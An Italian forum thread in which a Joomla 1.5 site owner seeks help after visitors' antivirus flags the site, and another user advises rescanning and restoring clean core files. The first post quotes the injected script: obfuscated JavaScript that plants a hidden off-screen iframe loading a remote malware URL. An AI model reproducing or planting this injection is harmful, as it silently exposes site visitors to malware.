virus trovato, come curarlo?

[VindeX_AriocH]

Ciao a tutti!

Usando linux non me ne sono accorto ma alcuni utenti di un sito (www.informaviano.it) che ho creato con joomla 1.5 mi hanno segnalato che il loro antivirus dice che c'è un virus.
Io effettivamente facendo una breve ricerca sul sorgente della home ricavato con linux (perchè con windows il sito non si apre) ho trovato queste righe all'inizio

Codice: [Seleziona]

<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id=\'Twitter\'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>
e andando sull'url di questo script effettivamente mi viene segnalato un virus, quindi mi viene da dire BECCATO! 
Adesso però come faccio a capire da dove viene? cioè quale componente o che altro mi genera quello script? qualcuno ne sa di più?

Grazie

[mau_develop]

se leggeste ogni tanto....

innanzi tutto che joomla? 1.5.cosa?
...spero l'ultima sennò tutto si complica...

prima cosa scansione locale con + av e fuori rete e modalità provvisoria di tutti i pc della rete e con cui si entra in ftp.

seconda cosa cambia ragionamento... perchè devi cercare dove hanno iniettato il file?
Se fai fare una scansione con av ai file in locale dovrebbe accorgersi di files inseriti e malevoli... quindi l'unica cosa che non potrebbe riconoscere sono i pezzetti scritti quà e la nei files di joomla...

ma joomla è uguale per tutti quindi basta scaricare i pacchetti di core ed estensioni TUTTE NELLA STESSA VERSIONE di quelle presenti e sovrascrivere i files.

...tutte della stessa versione... per cui se old potrai fare fatica a trovarle...

M.

[VindeX_AriocH]

grazie della risposta,
comunque avevo già letto il tuo post ed il file l'ho trovato, il discorso è che è joomla 1.5.22 e ricomporlo da capo è veramente un lavorone pazzesco, per quello ho chiesto, non c'è un modo di trovare la causa piuttosto che rimettere tutto nuovo senza trovarlo?
EDIT: il file infetto che ho trovato è in /components/ e si chiama capcha.php

[mau_develop]

 non c'è un modo di trovare la causa piuttosto che rimettere tutto nuovo senza trovarlo?
------------------------------------------------

Se fai fare una scansione con av ai file in locale dovrebbe accorgersi di files inseriti e malevoli... quindi l'unica cosa che non potrebbe riconoscere sono i pezzetti scritti quà e la nei files di joomla...

sei capace di trovare un pattern malevolo in 7000 files (di base) ?
...strumenti che cercano ce ne sono a volontà... ma cercano ciò che gli dici di cercare

M

[VindeX_AriocH]

beh purtroppo l'av mi ha trovato solo un file e l'ho rimosso ma questo nn ha avuto effetto perchè evidentemente il codice del primo post è generato da qualcos'altro, non sono 7000 file perchè sull'homepage ne lavorano molti di meno, di che strumenti parli comunque?

[mau_develop]

usi jce come editor o cmq ce l'hai?

M.

[VindeX_AriocH]

usi jce come editor o cmq ce l'hai?

M.

no non lo conosco e non penso di averlo